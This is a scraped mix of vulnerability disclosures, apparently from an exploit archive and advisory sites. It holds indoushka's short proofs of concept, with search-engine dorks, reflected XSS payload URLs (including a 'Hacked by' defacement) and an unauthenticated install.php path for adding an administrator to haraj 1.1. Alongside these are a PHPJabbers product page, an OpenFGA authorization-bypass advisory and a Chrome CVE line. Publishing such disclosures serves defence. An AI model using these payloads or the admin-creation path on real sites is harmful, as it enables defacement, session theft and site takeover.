Hesk Rtl CMS version 1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Hesk Rtl CMS v1 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://p30vel.ir                                                                                                  || # Dork      : فارسی سازی توسط وحید مجیدی / اسکریپت دات کام                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects : /Hesk/ajax.php. [+] Attack details :    URI was set to ;997612"():;991161    The input is reflected inside <script> tag between double quotesGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Hesk Rtl CMS 1 Cross Site Scripting

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

**Hasan MWB 1 Cross Site Scripting**

Posted Aug 28, 2023

Authored by indoushka

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4a53646feef7ce0d66491bbe2483dcbe70097fdb2aef17667fd6e5a2c356c92e

Download | Favorite | View

**Hasan MWB 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Hasan MWB v1 - XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               || # Vendor    : http://sourceforge.net/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,016)
*   Arbitrary (16,216)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,456)
*   Encryption (2,370)
*   Exploit (51,984)
*   File Inclusion (4,224)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,786)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,811)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,392)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,967)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,514)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,754)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,838)
*   UNIX (9,293)
*   UnixWare (186)
*   Windows (6,575)
*   Other

Hasan MWB 1 Cross Site Scripting

haraj version 1.1 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : haraj V1.1 Add ADmin Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.mediafire.com/file/ky3e6rtnb23mddd/free_haraj_v1.1.zip                                                 || # Dork      : V1.1 free برمجة وتصميم : سكربت حراج                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :  /setup/install.php?act=user[+] http://127.0.0.1/adplusgq/setup/install.php?act=userGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

haraj 1.1 Add Administrator

HaasCMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : HaasCMS v1.0 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://haasit.com/                                                                                                 |  | # Dork      : Website Design by Haas IT Solutions, Inc.                                                                          |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /printobit.php?id=437999999.9'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://target_site/printobit.php?id=437999999.9%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

HaasCMS 1.0 Cross Site Scripting

Gusto Recipes Management version 1.5.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Gusto - Recipes Management v1.5.1 System XSS Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.elmanawy.info/demo/gusto/                                                                              |  | # Dork      : /profile/1-gusto                                                                                                   |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use Payload : /search?category_id=1&title=Mr.'"()%26%25<acx><script>alert(/indoushka/);</script> [+]  https://127.0.0.1/elmanawyinfo/demo/gusto/recipes/search?category_id=1&title=Mr.%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E  Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gusto Recipes Management 1.5.1 Cross Site Scripting

Global Domains International version 2.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Global Domains International v2.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.worldsite.ws/                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected File : /idn-orderflow/index.dhtml [+] use Payload : /idn-orderflow/index.dhtml?act=pre_search&domains=Type a word&lang_original=af_</script><script>prompt(964811)</script>&no_new=true&search_from=frontpage&step=30&userid=bnftfnad&xs=[+] https://127.0.0.1/worldsitews/idn-orderflow/index.dhtml?act=pre_search&domains=Type%20a%20word&lang_original=af_%3C/script%3E%3Cscript%3Eprompt(964811)%3C/script%3E&no_new=true&search_from=frontpage&step=30&userid=bnftfnad&xs=Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Global Domains International 2.0 Cross Site Scripting

FlightPath LMS version 5.0-rc2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v5.0-rc2 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!>[+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 5.0-rc2 Cross Site Scripting

User enumeration is found in PHPJabbers Taxi Booking Script v2.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.

Let clients request taxi transfer services straight on your website!

Version: 2.0

Our online taxi booking system will help you improve your customer service and manage your taxi transfer business more efficiently. You can add as many cabs and extras as you can offer. The taxi script provides a simple, step-by-step booking process and an intuitive back-end administration system with password-secured access. You can adjust the cab booking script according to your specific needs. If further fine-tunings are necessary, just contact us and we'll customize it for you.

**Taxi Booking Script**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

This online taxi booking system is a great asset for all taxi service providers that have a website but no booking functionality yet. Take a look at the key features that come standard with our taxi script and test it out for yourself:

Easy Taxi Management

Create descriptive taxi profiles and help your clients select the most suitable car for their transfer. Set passenger and luggage limits. Define a start fee, the fee per person, and the price per mile.

Google Maps Integration

To select the pick-up and drop-off locations, customers simply need to start typing the address and select the right suggestion. The route will be marked on the built-in Google Map.

Various Extra Services

Add extra services through the back-end system of the online cab booking script and allow customers to select them while making the online reservation. You can set the price per service or price per person.

Email & SMS Notifications

Send custom autoresponder messages via email and SMS to both admins and clients upon a new booking, payment, or cancellation. To enable the SMS functionality, you need to request an API key. View SMS plans

Simple Booking Process

Customers can book their preferred taxi service and pay online in less than 5 minutes and 24/7, both from home and on the go – they just need to follow the easy step-by-step booking procedure.

10 Responsive Front-End Color Themes

The front-end UI of our cab booking script is mobile-optimized and adapts to all portable devices. Its layout is available in 10 different color schemes – pick the one that best matches your website design.

Online & Offline Payments

Clients can pay online using PayPal and Authorize.net or select a traditional payment method: cash, bank transfer, or credit card. Adjust your payment settings from the Admin Panel's back-end system.

PHP Source Code Customization

Buy a Developer License and modify the Taxi Booking Script according to your specific needs and your business model! Or we can customize it for you upon request.

SPECIAL OFFER

**Taxi Booking Script for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the online taxi booking system and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Taxi Booking Script**

**Key Benefits**

Script Modifications

Installation Support

Extended Licence

Key Features

Customizations

**Pricing**

You can buy the Taxi Booking Script both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our taxi script and how it has improved their online business!

“

Web Calendar by PHPJabbers is a great little script for a small price. For those who do not need or want the complexity of a calendaring program with tons of options that you never use, this is a great alternative. In addition, the support is quick and helpful. I would highly recommend others to give this Web Calendar script a try. It is well worth it.

Michael Monos

“

We purchased the Web Calendar from PHPjabbers.com several months ago, this web calendar is awesome and very easy to setup/use. We were easily able to create a form to allow users to add events to the calendar due to the nice database design. While the settings that come with the software are great, recently we had a need to change some other colors and Kosta was awesome working with us to make that happen.

Mike Sweany

“

You are a life-save. I am so pleased with your products and services. I will recommend your scripts at PHPJabbers.com to whom I know will benefit from it.  
Thanks. You guys are amazing!

Jennifer Solis

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Taxi Booking Script.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related PHP Scripts**

**Limo Booking Software**

$59 / $99

**Shuttle Booking Software**

$69 / $109

**Car Rental Script**

$79 / $129

**Bus Reservation System**

$79 / $129

**Car Park Booking System**

$59 / $99

**Auto Classifieds Script**

$39 / $69

CVE-2023-40763: Taxi Booking Script | PHPJabbers

OpenFGA is an authorization/permission engine built for developers and inspired by Google Zanzibar. Some end users of OpenFGA v1.3.0 or earlier are vulnerable to authorization bypass when calling the ListObjects API. The vulnerability affects customers using `ListObjects` with specific models. The affected models contain expressions of type `rel1 from type1`. This issue has been patched in version 1.3.1.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Package**

gomod openfga/openfga (Go)

**Description**

**Overview**

Some end users of OpenFGA v1.3.0 or earlier are vulnerable to authorization bypass when calling the ListObjects API. UPDATE: This means that the API sometimes returns more objects than it should.

**Am I Affected?**

The vulnerability affects customers using ListObjects with specific models. The affected models contain expressions of type rel1 from type1.

**Fix**

Update to v1.3.1.

**Backward Compatibility**

This update is backward compatible.

CVE-2023-40579: OpenFGA Authorization Bypass

Inappropriate implementation in OS in Google Chrome on ChromeOS prior to 75.0.3770.80 allowed a remote attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: High)

Tag

#google